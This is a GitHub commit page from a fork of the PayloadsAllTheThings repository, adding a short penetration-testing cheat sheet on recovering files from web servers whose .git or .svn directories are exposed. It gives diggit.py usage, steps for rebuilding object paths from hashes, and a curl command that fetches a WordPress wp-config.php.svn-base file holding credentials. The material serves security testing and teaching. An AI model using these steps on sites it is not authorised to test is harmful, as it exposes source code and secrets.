forked from swisskyrepo/PayloadsAllTheThings
-
Notifications
You must be signed in to change notification settings - Fork 2
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Swissky
committed
Feb 17, 2017
1 parent
eca05b5
commit e7f3e7a
Showing
1 changed file
with
45 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,45 @@ | ||
| # GIT - Source management | ||
|
|
||
| Github example | ||
| 1. Check 403 error (Forbidden) for .git | ||
|
|
||
| 2. Git saves all informations in log file .git/logs/HEAD (try 'head' too) | ||
| ``` | ||
| 0000000000000000000000000000000000000000 07603070376d63d911f608120eb4b5489b507692 | ||
| [email protected] <[email protected]> 1452195279 +0000 commit (initial): index.php initial commit | ||
| ``` | ||
|
|
||
| 3. Acces the commit based on the hash -> a directory name (first two signs from hash) and filename (rest of it).git/objects/07/603070376d63d911f608120eb4b5489b507692, | ||
|
|
||
| 4. Use diggit.py | ||
| ``` | ||
| ./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True] | ||
| ./diggit.py -u http://webpage.com -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1 | ||
| -u is remote path, where .git folder exists | ||
| -t is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (cd /path/to/temp/folder && git init) | ||
| -o is a hash of particular Git object to download | ||
| ``` | ||
|
|
||
| # SVN - Source management | ||
| SVN example (Wordpress) | ||
| ``` | ||
| curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base | ||
| ``` | ||
|
|
||
| 1. Download the svn database | ||
| http://server/path_to_vulnerable_site/.svn/wc.db | ||
| ``` | ||
| INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL); | ||
| ``` | ||
|
|
||
| 2. Download interesting files | ||
| remove $sha1$ prefix | ||
| add .svn-base postfix | ||
| use first two signs from hash as folder name inside pristine/ directory (94 in this case) | ||
| create complete path, which will be: http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base | ||
|
|
||
|
|
||
| ## Thanks to | ||
| * bl4de, https://github.com/bl4de/research/tree/master/hidden_directories_leaks | ||
| * bl4de, https://github.com/bl4de/security-tools/tree/master/diggit |